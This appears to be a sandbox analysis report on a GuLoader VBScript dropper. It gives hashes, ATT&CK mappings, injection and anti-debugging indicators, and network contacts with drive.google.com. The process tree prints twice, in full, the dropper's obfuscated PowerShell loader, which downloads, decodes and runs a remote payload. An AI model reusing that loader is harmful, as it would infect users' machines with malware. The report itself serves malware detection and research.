guloader | dbaf0103b94b49370b87cfdf0feb19811e3373da314b065d8068fab0bc003fde

General

Target

dbaf0103b94b49370b87cfdf0feb19811e3373da314b065d8068fab0bc003fde.vbs
Size

25KB
MD5

e21aac072a10d80842d362743e1ffa59
SHA1

d8b3aeffe2eedc17e06bafecd26b603c6a8908b9
SHA256

dbaf0103b94b49370b87cfdf0feb19811e3373da314b065d8068fab0bc003fde
SHA512

7046ea4afb9ce9b490bf4fd7f2db533bded2eefc88dc64a80809f5e7fef6d184b2259a15cb06f6f1ebb92dcbd1a9b5f8d471ae1201557d07075827ad2a7ffa78
SSDEEP

384:r0Dk2uAnMKYHzkvaZGxeecfCPNPh7ZbIxUXGDZ6SMTXJ7pZXi7m4d4ud0oekM25z:r0o2/YHocW9ZUxa6K5i5B75aFzoWLv3K

Score

10^/10

guloader downloader

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Blocklisted process makes network request 3 IoCs

flow	pid	Process
3	4028	WScript.exe
9	1304	powershell.exe
11	1304	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	WScript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
8	drive.google.com
9	drive.google.com
30	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
4396	wab.exe
4396	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
4252	powershell.exe
4396	wab.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4252 set thread context of 4396	4252	powershell.exe	97

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1992	4396	WerFault.exe	97

Suspicious behavior: EnumeratesProcesses 21 IoCs

pid	Process
1304	powershell.exe
1304	powershell.exe
4252	powershell.exe
4252	powershell.exe
4252	powershell.exe
4396	wab.exe
4396	wab.exe
4396	wab.exe
4396	wab.exe
4396	wab.exe
4396	wab.exe
4396	wab.exe
4396	wab.exe
4396	wab.exe
4396	wab.exe
4396	wab.exe
4396	wab.exe
4396	wab.exe
4396	wab.exe
4396	wab.exe
4396	wab.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
4252	powershell.exe
4396	wab.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1304	powershell.exe
Token: SeDebugPrivilege	4252	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 4028 wrote to memory of 1304	4028	WScript.exe	84
PID 4028 wrote to memory of 1304	4028	WScript.exe	84
PID 1304 wrote to memory of 2544	1304	powershell.exe	87
PID 1304 wrote to memory of 2544	1304	powershell.exe	87
PID 1304 wrote to memory of 4252	1304	powershell.exe	92
PID 1304 wrote to memory of 4252	1304	powershell.exe	92
PID 1304 wrote to memory of 4252	1304	powershell.exe	92
PID 4252 wrote to memory of 2524	4252	powershell.exe	94
PID 4252 wrote to memory of 2524	4252	powershell.exe	94
PID 4252 wrote to memory of 2524	4252	powershell.exe	94
PID 4252 wrote to memory of 4396	4252	powershell.exe	97
PID 4252 wrote to memory of 4396	4252	powershell.exe	97
PID 4252 wrote to memory of 4396	4252	powershell.exe	97
PID 4252 wrote to memory of 4396	4252	powershell.exe	97
PID 4252 wrote to memory of 4396	4252	powershell.exe	97

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dbaf0103b94b49370b87cfdf0feb19811e3373da314b065d8068fab0bc003fde.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4028
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Tubas = 1;Function Brigaderen($Tautegory){$Chomper=$Tautegory.Length-$Tubas;$Fremkalderskaalene='Substring';For( $Varicelloid=7;$Varicelloid -lt $Chomper;$Varicelloid+=8){$Rumfangsformler+=$Tautegory.$Fremkalderskaalene.Invoke( $Varicelloid, $Tubas);}$Rumfangsformler;}function Eritreansk($Gnubbe){ . ($Rimesters) ($Gnubbe);}$Gauffering75=Brigaderen ' IsobioMSuper eoKarleagzdetekteiHyd icalVanillalcopitapaReh.ndl/Sgefu.k5jagtudf.R.versi0 l.ntie Al.enat(BigeminW rediviguldaldn cepterd jogschoPro toow Efte ts Potli, VulkanbNMisstatTAdenody Tetraf1 .ymeno0,tuccos.Coprodu0Radarov; Isoch Allerp.WUdbudsmi KloofenSque.ch6aesthet4Galskab;peachi, Kont.ahx Gldsfo6 Omn pr4 Gibb r;Bevidst Indha,rLnniveavSensiti:Afg.fts1Brepose2Dioptid1 Horrid.K,melwa0Antropo)Vederkv LinjeriGUforudseTrouveucLatestrkSwoonedo ,azoca/Biote n2Benedic0Usurp r1Frembyd0skabera0Kvilibr1Uneq.ab0Ne.lige1Stanges ,eprofoF DomeniiOnt.logr HymenoeFestm dfTegnekooTainofoxPakse.s/a,ledes1Sitolog2Swahili1 Anmass. Phytol0Bis.ten ';$Skyl96=Brigaderen 'T istedULanternsDesil,cePeriodfrLandbru-postverAKrad.ergFoliatoeFaatallnWe,ooletFormule ';$Sommerlejrs=Brigaderen 'SynoekyhMellititAudiofot KinnikpT akeoesUdrykni:Ser.ice/ Quisli/Neur.med LavaerrS.ayboliPrsteskvUdsendoeTings,e. Raimeng Funde oAnt.ropo Orbitsg Ci,ronlTvangsae Dis as.NewtonkcBrislino mitsomm Glorif/ BestrauNupt,alcAvleres? skrivee,afjulex.rnnegap RescoroHovedpirXeromortFlamini=InterlidReko,vaouskaanswfjset mnDgneneolUnrev roFrilleraSmaaligdPrealle& RecitaiParafradTakneml=Dagsomm1.ationaURunesteaV.rksomEAnlgstj6.ennierA Over.t9RadioakoU,rligsGimdeg.aNLuftvrd6 WildfoEGo lsspLEkst,ab_ un eekvHolognadKreisfuvBesttergDa.nissORecessiv,everymOUnfraud4 ,nnovaN Do,rpihi,cipieMVandyke5TvelydeaCourtroVContrabVpreaggrl RverkuA.ejlmeldC,oruseOUnderst ';$Underetagens=Brigaderen '.olitur> Atomke ';$Rimesters=Brigaderen 'Bl.ckiniInflatieMala,maxColiand ';$Outkicked='Studiebesg';$Materialprvning160 = Brigaderen 'U contre Aggresc Bruddeh imdesaoSk.llen Analys%Av nceraPostvsepFangedepTowboatdSamfundaAbsoluttReificeaMestern%Bjlena,\ MultisCQuaintea,rooklymPaxillapTiebo.thosseocao Op niar SolidaaMumpme,tOverflyeHugge,e.JonosfrI.ndecimnSkip.edtSullied Narcoba&Sightse&Marchen AbrasaxeByfo.edcAsilusbhVandforoFolkeva Staalvt Catost ';Eritreansk (Brigaderen 'Piastre$ WantwigSvalegalToadi.roMisdi.ibKonjunkaArbejd l Tandpa:RetorsiRbeknigheNeurot cArbejdsaDo ahshlRingmrkcOverdiliD masketFredlysrPaeonysa Hkerkvt VentaiiRipo,fsoGlas.blnHazel o=fortynd(Fore.skcOverma,mkontokud Efters Antioxi/Be,vangcFremskr Restau$AntepagM CaconyaS,yggert ,attedeIndbererdresseriDiscomma esaticlVrdiladp JordberLgnede.vShithean StyriniDametvanCubomedgFen,ici1Rivalin6K,ntine0Hastesa) An,ass ');Eritreansk (Brigaderen 'Knytte,$RestuffgH.ightslVillachou.gkarlbpy,anssaLabbe,elfolkepa:PhotoporNonintreMacedois UdspritAldohepiMicrocaaNonneglcSuccesle FlygtnoRefingeu SamarbsFor.ikr=Constri$ScablanS HalopeoShoneysmMaca.ammMegathee StikpirGebinddl FrikadeOpacifij PalliarMyxopods Rooibo. PiberesTeaerl,pPhotodelReconceiIsocardtVanskab(Cosmopo$ FirvreU FuskthnHockeysdSaalegne.ythagorPseudo eBiochipt Bioscoa BasarsgredigereHokeyconPrelatesBrunrod)Whensoe ');$Sommerlejrs=$restiaceous[0];$Fjerdedeles= (Brigaderen 'For,rin$BrakpljgEmbed mlsammenkoSystemibRecomf a SidetalZygophy:PhysiopDN dkulesC.rdifoi,rdikengRegrabb=GennembNTraheeneBlondelwDraabne-MissampOCyanomeb H.ppenj kandideInternacRabbinatSendeti CinnamoSramp neySupere,sEksplictCyanamieTegneb.mStoress.UgennemNTran,ple godfretFunktio. Kro,odWLdermbleBystandbUnde.paCneonreklHenseeniI relateSildigenIncorpst');$Fjerdedeles+=$Recalcitration[1];Eritreansk ($Fjerdedeles);Eritreansk (Brigaderen 'Incom,l$ForshapDFa cines SeamosiUnthrivgMorion..MutuallHbefordre Amtr caUnte,podDisinfeeStringmrPuruloisSalolda[Ci cums$venere SFizzkn kBeskyttyBu,dfarlSu,erla9Tenorsa6Sammenl]Litoral=Dispens$ paavisG .etameaBut,kopuEftera fN keligfHypodereSak istrBoligbeivoldshan Dokumeg Afs,ri7Afgjord5Veinies ');$Georgians=Brigaderen ' Warmho$ .izequDStoedtdsbaroksti MeowsrgS.illin.Fjer itDHemicenoExponibwSp.rtsfnPladskrl Indu.topalstafaA,mstoldDeposi,F AnbriniTrikololRuflende Tegl,n(Underkj$DeklassSCompulso BrostemMahalapm Fag ideOpvarmer .nkasslformalieunmol.sjSlackenrKoppev,sDefinit,Politik$SkisporMStolemarAmetabok PingueeorbiculsB,selbeaAssa sigHindbrmeIrrepenrBvresdenGawbyloe UppbadsH.stori2Helsink2gyn dio9U,raabs) .ejrst ';$Mrkesagernes229=$Recalcitration[0];Eritreansk (Brigaderen 'Sabel,i$Disor,egSpaanpllCancio oTende cbProlixiaP.acidnlR sprmi:KatetenMDrmmereoAs ptolsDrumloieyesotiddEurus.beBowl.ss=Mishags(Lionis.TPresseeeRespectsTe.oristUnprotu-Paatr,kPUnoperaacryogentPas ourh Ang oc A vtage$Fort,ltMHsternerRevisiokCamelidepestaersInst.ncaHidkaldgExemptieSystemprAtomermnNanomete OuthypsMeshuga2 negois2Calpack9Sektere)Damasce ');while (!$Mosede) {Eritreansk (Brigaderen 'Vertika$Gtepag.gRepulsilDominanoAfspejlbFremtida aastoflfli,pet:kogerskUToksikodUdbud,tsinclusomCarinasyUnwhimpk etingkDiminiseUncolladUnabashe Hellig=,ovetin$UnhookstPerioptrcallipyuLigningeTis yks ') ;Eritreansk $Georgians;Eritreansk (Brigaderen 'SubetleS GudesatSloteneaUdskejerRek.isit S.para-GudgiveSAldolizlPilledbeMicromee Paral,pValdrap Miljakt4wardshi ');Eritreansk (Brigaderen 'Fetaost$EksemplganstteslFstemndoGiselanbBrucellaAtomhemlVaeltei:HypostoMM.skottoUbetonesNonaffieSikkerhdUndvrlie Klangf=Genindt(DemonstTWate,steDingless unr sutPoritef-DethronPRaaski.aK lonistMinensjhhobbyh, Foge,er$Vei.ersM be.ogtrGutturikHearseceTaliasbs baklysaMeddelagSniv,leeElskerir Ov,rlbnSe,iaeneLigenessTrkosts2 Snakel2 Owerle9Gangste) T atha ') ;Eritreansk (Brigaderen 'Bortfre$Sub lobgUsdeli.lTe,eskooSale wobKikke,taRealiv lAcetoth:De igraSLactuceuMeijizepPy,opesp unnito.ogiernsRitzymeibrskur.tLascarii OpridsoUncredinUltranaeSlittesrPilchernSeismogeLotionpsunbaste9siv pit6 Deling=Hyp,rvi$Tun,ellg ParlialBruustaoPennysibTri.lunaBeladyilCa,diog:Qu.nariSTh,rdisevelsestrOvereatgSkraalelTimelofoHighbinb M.ssekuFrizadolHundekuiMander n Eflreh+ Co,nte+ Tumlin% ,emiau$bisayanrCamailseGhostf.sKitchentgluciddiCoggledaSmileryc Egen,ie Bog aroFortaleuDeclinesPepin.l.BnkendecYeomanho Ste nuuPlatyrrn otifitSki,rco ') ;$Sommerlejrs=$restiaceous[$Suppositionernes96];}$Udmrker9=329315;$Betjentene=28891;Eritreansk (Brigaderen '.adioas$ .esvergMangelllOvertemo InnuatbVenligha anuttlVikl,ng:.ndianeSfagstudtBkkenbuuVagtskip forbrneB.silicfAksemagiAbbrevieCommissr nsehol Trnere=hyg,eni Sk,etsoGZygota.eEx,alantstvstor-MaskensCBoardinoTopogranGudstjetGu.dsmeeCentaurnStrudsmtUninter Underf$Int,midM L.keror He,tevk Perinee.nopskys,rebaneaAfbarkeg acunareskorsterFremlaenHaystaceCarnivosTvangsi2Fikserb2Antagon9.orship ');Eritreansk (Brigaderen ' R,sgif$OmvisnigSubcomml RetrogoHou,elebKontohaaPeck kal Algebr:ReabsoreLogli enEncroacgdobbeltrPalaeobo BacksesMe.ernepEqu.cosr Hvaleri tejst,sErhver,eterpentrGnavernnHovedhjeOv rhitsPilgrim Lrebo s=Disa,fe Umyndig[F totekS BadestyRondelesRestriktPrologied.svulnmDebitso.Su.tesgCFeller.oUndervanAfmyto,vTildrage SemisirBetjenitWhitewa]Purpure:vestitu:NuzzerkFIntratrr IsraeloSharon,mSerienuBBigeminaBambu,ms Assotse ,ubten6Medtage4 k ravaSRoerenttHilltoprDesignli promenn tidiphgTruantl( Remoti$SlappetSIntell tPi,paycuStraffepBrdskreebra,kedf ,tinkaiMilj eee SexiporStyrkel)Trepidl ');Eritreansk (Brigaderen 'Per.spl$Surpr.cgSejlspolRadereto Epi,iabPredeleareshowelFrisken:jammerlSnondetrnVillaseu UnsmokgSpgelsegAfstamnlDngendeyLegatkr Indlade=Alenepi Venst,e[Enwe veSAnallany H,linesVoldf tt Ken.aueSvidesumBromate.Hovel,iTBadeniceDeklamax NonrattEmpathi.EngraftEBe,alusnBle endcSubtopioFlorizidMedarbei,ancuninIndustrgblkhusu]Varskor:U,splen: OverseAIm roprS okumeCTrningsIDerivatIForuren.SlingreG KrigsmeDesperatHandglaSHo.ocert Hoevisr SimbliiLdigerenPetuniegudkonku(Vestmen$Bi,telee ProgranC,ntraegMantaudrLochinooFirebrisV,versbpSodak,gr,ngarebiUrpremisReemergeReexprerVrdifasnRanidpreUnshipwsCo.mand) Snesko ');Eritreansk (Brigaderen 'Amylans$BlennotgLjerliglKul.urboArbejdsbD,mfldtaCleanlilSinfoni:kl,pperOOmklassnIllegaldindtal uDenimsnl GldesleRaavildrGlidebaeLineolad DobbeleVand.ogsForuren=Erwinco$TrilogiSSurahipnVariantuCha,ottg P.rtrtgDisservlSka aerySkiftva.Douchins AfkalkuR stendbVolatilsIstr,ant Fonetir Insurri SamsennEsdragogForrib (Skjalde$Vug,iesU irginidEternizmStrapher GlippekPennepreSmirk urLedeord9Sendere,Uncount$OverdecB Daabsfe Vaagebt Rotatij Dyret e .ageannPrydsastHeptrane Re.tetnConcerteReds.ar)incurre ');Eritreansk $Onduleredes;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1304
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Camphorate.Int && echo t"
    3⤵
    PID:2544
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Tubas = 1;Function Brigaderen($Tautegory){$Chomper=$Tautegory.Length-$Tubas;$Fremkalderskaalene='Substring';For( $Varicelloid=7;$Varicelloid -lt $Chomper;$Varicelloid+=8){$Rumfangsformler+=$Tautegory.$Fremkalderskaalene.Invoke( $Varicelloid, $Tubas);}$Rumfangsformler;}function Eritreansk($Gnubbe){ . ($Rimesters) ($Gnubbe);}$Gauffering75=Brigaderen ' IsobioMSuper eoKarleagzdetekteiHyd icalVanillalcopitapaReh.ndl/Sgefu.k5jagtudf.R.versi0 l.ntie Al.enat(BigeminW rediviguldaldn cepterd jogschoPro toow Efte ts Potli, VulkanbNMisstatTAdenody Tetraf1 .ymeno0,tuccos.Coprodu0Radarov; Isoch Allerp.WUdbudsmi KloofenSque.ch6aesthet4Galskab;peachi, Kont.ahx Gldsfo6 Omn pr4 Gibb r;Bevidst Indha,rLnniveavSensiti:Afg.fts1Brepose2Dioptid1 Horrid.K,melwa0Antropo)Vederkv LinjeriGUforudseTrouveucLatestrkSwoonedo ,azoca/Biote n2Benedic0Usurp r1Frembyd0skabera0Kvilibr1Uneq.ab0Ne.lige1Stanges ,eprofoF DomeniiOnt.logr HymenoeFestm dfTegnekooTainofoxPakse.s/a,ledes1Sitolog2Swahili1 Anmass. Phytol0Bis.ten ';$Skyl96=Brigaderen 'T istedULanternsDesil,cePeriodfrLandbru-postverAKrad.ergFoliatoeFaatallnWe,ooletFormule ';$Sommerlejrs=Brigaderen 'SynoekyhMellititAudiofot KinnikpT akeoesUdrykni:Ser.ice/ Quisli/Neur.med LavaerrS.ayboliPrsteskvUdsendoeTings,e. Raimeng Funde oAnt.ropo Orbitsg Ci,ronlTvangsae Dis as.NewtonkcBrislino mitsomm Glorif/ BestrauNupt,alcAvleres? skrivee,afjulex.rnnegap RescoroHovedpirXeromortFlamini=InterlidReko,vaouskaanswfjset mnDgneneolUnrev roFrilleraSmaaligdPrealle& RecitaiParafradTakneml=Dagsomm1.ationaURunesteaV.rksomEAnlgstj6.ennierA Over.t9RadioakoU,rligsGimdeg.aNLuftvrd6 WildfoEGo lsspLEkst,ab_ un eekvHolognadKreisfuvBesttergDa.nissORecessiv,everymOUnfraud4 ,nnovaN Do,rpihi,cipieMVandyke5TvelydeaCourtroVContrabVpreaggrl RverkuA.ejlmeldC,oruseOUnderst ';$Underetagens=Brigaderen '.olitur> Atomke ';$Rimesters=Brigaderen 'Bl.ckiniInflatieMala,maxColiand ';$Outkicked='Studiebesg';$Materialprvning160 = Brigaderen 'U contre Aggresc Bruddeh imdesaoSk.llen Analys%Av nceraPostvsepFangedepTowboatdSamfundaAbsoluttReificeaMestern%Bjlena,\ MultisCQuaintea,rooklymPaxillapTiebo.thosseocao Op niar SolidaaMumpme,tOverflyeHugge,e.JonosfrI.ndecimnSkip.edtSullied Narcoba&Sightse&Marchen AbrasaxeByfo.edcAsilusbhVandforoFolkeva Staalvt Catost ';Eritreansk (Brigaderen 'Piastre$ WantwigSvalegalToadi.roMisdi.ibKonjunkaArbejd l Tandpa:RetorsiRbeknigheNeurot cArbejdsaDo ahshlRingmrkcOverdiliD masketFredlysrPaeonysa Hkerkvt VentaiiRipo,fsoGlas.blnHazel o=fortynd(Fore.skcOverma,mkontokud Efters Antioxi/Be,vangcFremskr Restau$AntepagM CaconyaS,yggert ,attedeIndbererdresseriDiscomma esaticlVrdiladp JordberLgnede.vShithean StyriniDametvanCubomedgFen,ici1Rivalin6K,ntine0Hastesa) An,ass ');Eritreansk (Brigaderen 'Knytte,$RestuffgH.ightslVillachou.gkarlbpy,anssaLabbe,elfolkepa:PhotoporNonintreMacedois UdspritAldohepiMicrocaaNonneglcSuccesle FlygtnoRefingeu SamarbsFor.ikr=Constri$ScablanS HalopeoShoneysmMaca.ammMegathee StikpirGebinddl FrikadeOpacifij PalliarMyxopods Rooibo. PiberesTeaerl,pPhotodelReconceiIsocardtVanskab(Cosmopo$ FirvreU FuskthnHockeysdSaalegne.ythagorPseudo eBiochipt Bioscoa BasarsgredigereHokeyconPrelatesBrunrod)Whensoe ');$Sommerlejrs=$restiaceous[0];$Fjerdedeles= (Brigaderen 'For,rin$BrakpljgEmbed mlsammenkoSystemibRecomf a SidetalZygophy:PhysiopDN dkulesC.rdifoi,rdikengRegrabb=GennembNTraheeneBlondelwDraabne-MissampOCyanomeb H.ppenj kandideInternacRabbinatSendeti CinnamoSramp neySupere,sEksplictCyanamieTegneb.mStoress.UgennemNTran,ple godfretFunktio. Kro,odWLdermbleBystandbUnde.paCneonreklHenseeniI relateSildigenIncorpst');$Fjerdedeles+=$Recalcitration[1];Eritreansk ($Fjerdedeles);Eritreansk (Brigaderen 'Incom,l$ForshapDFa cines SeamosiUnthrivgMorion..MutuallHbefordre Amtr caUnte,podDisinfeeStringmrPuruloisSalolda[Ci cums$venere SFizzkn kBeskyttyBu,dfarlSu,erla9Tenorsa6Sammenl]Litoral=Dispens$ paavisG .etameaBut,kopuEftera fN keligfHypodereSak istrBoligbeivoldshan Dokumeg Afs,ri7Afgjord5Veinies ');$Georgians=Brigaderen ' Warmho$ .izequDStoedtdsbaroksti MeowsrgS.illin.Fjer itDHemicenoExponibwSp.rtsfnPladskrl Indu.topalstafaA,mstoldDeposi,F AnbriniTrikololRuflende Tegl,n(Underkj$DeklassSCompulso BrostemMahalapm Fag ideOpvarmer .nkasslformalieunmol.sjSlackenrKoppev,sDefinit,Politik$SkisporMStolemarAmetabok PingueeorbiculsB,selbeaAssa sigHindbrmeIrrepenrBvresdenGawbyloe UppbadsH.stori2Helsink2gyn dio9U,raabs) .ejrst ';$Mrkesagernes229=$Recalcitration[0];Eritreansk (Brigaderen 'Sabel,i$Disor,egSpaanpllCancio oTende cbProlixiaP.acidnlR sprmi:KatetenMDrmmereoAs ptolsDrumloieyesotiddEurus.beBowl.ss=Mishags(Lionis.TPresseeeRespectsTe.oristUnprotu-Paatr,kPUnoperaacryogentPas ourh Ang oc A vtage$Fort,ltMHsternerRevisiokCamelidepestaersInst.ncaHidkaldgExemptieSystemprAtomermnNanomete OuthypsMeshuga2 negois2Calpack9Sektere)Damasce ');while (!$Mosede) {Eritreansk (Brigaderen 'Vertika$Gtepag.gRepulsilDominanoAfspejlbFremtida aastoflfli,pet:kogerskUToksikodUdbud,tsinclusomCarinasyUnwhimpk etingkDiminiseUncolladUnabashe Hellig=,ovetin$UnhookstPerioptrcallipyuLigningeTis yks ') ;Eritreansk $Georgians;Eritreansk (Brigaderen 'SubetleS GudesatSloteneaUdskejerRek.isit S.para-GudgiveSAldolizlPilledbeMicromee Paral,pValdrap Miljakt4wardshi ');Eritreansk (Brigaderen 'Fetaost$EksemplganstteslFstemndoGiselanbBrucellaAtomhemlVaeltei:HypostoMM.skottoUbetonesNonaffieSikkerhdUndvrlie Klangf=Genindt(DemonstTWate,steDingless unr sutPoritef-DethronPRaaski.aK lonistMinensjhhobbyh, Foge,er$Vei.ersM be.ogtrGutturikHearseceTaliasbs baklysaMeddelagSniv,leeElskerir Ov,rlbnSe,iaeneLigenessTrkosts2 Snakel2 Owerle9Gangste) T atha ') ;Eritreansk (Brigaderen 'Bortfre$Sub lobgUsdeli.lTe,eskooSale wobKikke,taRealiv lAcetoth:De igraSLactuceuMeijizepPy,opesp unnito.ogiernsRitzymeibrskur.tLascarii OpridsoUncredinUltranaeSlittesrPilchernSeismogeLotionpsunbaste9siv pit6 Deling=Hyp,rvi$Tun,ellg ParlialBruustaoPennysibTri.lunaBeladyilCa,diog:Qu.nariSTh,rdisevelsestrOvereatgSkraalelTimelofoHighbinb M.ssekuFrizadolHundekuiMander n Eflreh+ Co,nte+ Tumlin% ,emiau$bisayanrCamailseGhostf.sKitchentgluciddiCoggledaSmileryc Egen,ie Bog aroFortaleuDeclinesPepin.l.BnkendecYeomanho Ste nuuPlatyrrn otifitSki,rco ') ;$Sommerlejrs=$restiaceous[$Suppositionernes96];}$Udmrker9=329315;$Betjentene=28891;Eritreansk (Brigaderen '.adioas$ .esvergMangelllOvertemo InnuatbVenligha anuttlVikl,ng:.ndianeSfagstudtBkkenbuuVagtskip forbrneB.silicfAksemagiAbbrevieCommissr nsehol Trnere=hyg,eni Sk,etsoGZygota.eEx,alantstvstor-MaskensCBoardinoTopogranGudstjetGu.dsmeeCentaurnStrudsmtUninter Underf$Int,midM L.keror He,tevk Perinee.nopskys,rebaneaAfbarkeg acunareskorsterFremlaenHaystaceCarnivosTvangsi2Fikserb2Antagon9.orship ');Eritreansk (Brigaderen ' R,sgif$OmvisnigSubcomml RetrogoHou,elebKontohaaPeck kal Algebr:ReabsoreLogli enEncroacgdobbeltrPalaeobo BacksesMe.ernepEqu.cosr Hvaleri tejst,sErhver,eterpentrGnavernnHovedhjeOv rhitsPilgrim Lrebo s=Disa,fe Umyndig[F totekS BadestyRondelesRestriktPrologied.svulnmDebitso.Su.tesgCFeller.oUndervanAfmyto,vTildrage SemisirBetjenitWhitewa]Purpure:vestitu:NuzzerkFIntratrr IsraeloSharon,mSerienuBBigeminaBambu,ms Assotse ,ubten6Medtage4 k ravaSRoerenttHilltoprDesignli promenn tidiphgTruantl( Remoti$SlappetSIntell tPi,paycuStraffepBrdskreebra,kedf ,tinkaiMilj eee SexiporStyrkel)Trepidl ');Eritreansk (Brigaderen 'Per.spl$Surpr.cgSejlspolRadereto Epi,iabPredeleareshowelFrisken:jammerlSnondetrnVillaseu UnsmokgSpgelsegAfstamnlDngendeyLegatkr Indlade=Alenepi Venst,e[Enwe veSAnallany H,linesVoldf tt Ken.aueSvidesumBromate.Hovel,iTBadeniceDeklamax NonrattEmpathi.EngraftEBe,alusnBle endcSubtopioFlorizidMedarbei,ancuninIndustrgblkhusu]Varskor:U,splen: OverseAIm roprS okumeCTrningsIDerivatIForuren.SlingreG KrigsmeDesperatHandglaSHo.ocert Hoevisr SimbliiLdigerenPetuniegudkonku(Vestmen$Bi,telee ProgranC,ntraegMantaudrLochinooFirebrisV,versbpSodak,gr,ngarebiUrpremisReemergeReexprerVrdifasnRanidpreUnshipwsCo.mand) Snesko ');Eritreansk (Brigaderen 'Amylans$BlennotgLjerliglKul.urboArbejdsbD,mfldtaCleanlilSinfoni:kl,pperOOmklassnIllegaldindtal uDenimsnl GldesleRaavildrGlidebaeLineolad DobbeleVand.ogsForuren=Erwinco$TrilogiSSurahipnVariantuCha,ottg P.rtrtgDisservlSka aerySkiftva.Douchins AfkalkuR stendbVolatilsIstr,ant Fonetir Insurri SamsennEsdragogForrib (Skjalde$Vug,iesU irginidEternizmStrapher GlippekPennepreSmirk urLedeord9Sendere,Uncount$OverdecB Daabsfe Vaagebt Rotatij Dyret e .ageannPrydsastHeptrane Re.tetnConcerteReds.ar)incurre ');Eritreansk $Onduleredes;"
    3⤵
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4252
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Camphorate.Int && echo t"
      4⤵
      PID:2524
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      PID:4396
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1680
        5⤵
        Program crash
        
        PID:1992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4396 -ip 4396
1⤵
PID:2432

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Copolymerise.txt

Filesize
8KB

MD5
19c2705572794894cfb99f2e8a39e54a

SHA1
bbb7ed43de4aa50aaee18cfa4cfb9e00ec834d5c

SHA256
24a1748ccda00bef2a8f1ad7a464a30d9215a04e72710dd8ce1e8b3c7ee90c99

SHA512
7dd8667ca72a4400dc245736f7fd712f85cf5a5459c06f706f6a320f79f8b6696ded2d7f97c79b1957fcf6f442b8a65fc7134b123d64ea732fd65853cf29c1df

Download Submit
C:\Users\Admin\AppData\Local\Temp\Copolymerise.txt

Filesize
601B

MD5
7cb382f0a7e3fe1a94b8c0bb44e69d82

SHA1
ebaae1cdcf890889b25504c4b3ad80f621f54048

SHA256
b92902c6b90774a628e748557bba8971c1eed3bc8e730f9f36544927389d4750

SHA512
925020c8002c3dbbb9bb6080955680d07244d4db3d2cc48a1cffcc2e3454c9d998723628b269208baacc9f4c2416bd69f65fd6b184f561ab3902aff6b562ba57

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_erc3llnl.5dp.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Camphorate.Int

Filesize
466KB

MD5
1433367c943db23af72250230989b433

SHA1
39f09cb203d69a261d0fdefd7e728b427f96c68c

SHA256
9644988f82efa9c23f619e107092cc8275d65af5bd4931f25aa52263efecc738

SHA512
62a8d7dbd547d121f435ed9a4f00f75f56494ef05cfb91369424eb3308dd303212cfc018e690c188e27ec84510c389e10698044fa6da4399f8c92852e9d32edb

Download Submit
memory/1304-313-0x00007FFA2AFD3000-0x00007FFA2AFD5000-memory.dmp

Filesize
8KB

Download
memory/1304-319-0x000001E6D0110000-0x000001E6D0132000-memory.dmp

Filesize
136KB

Download
memory/1304-324-0x00007FFA2AFD0000-0x00007FFA2BA91000-memory.dmp

Filesize
10.8MB

Download
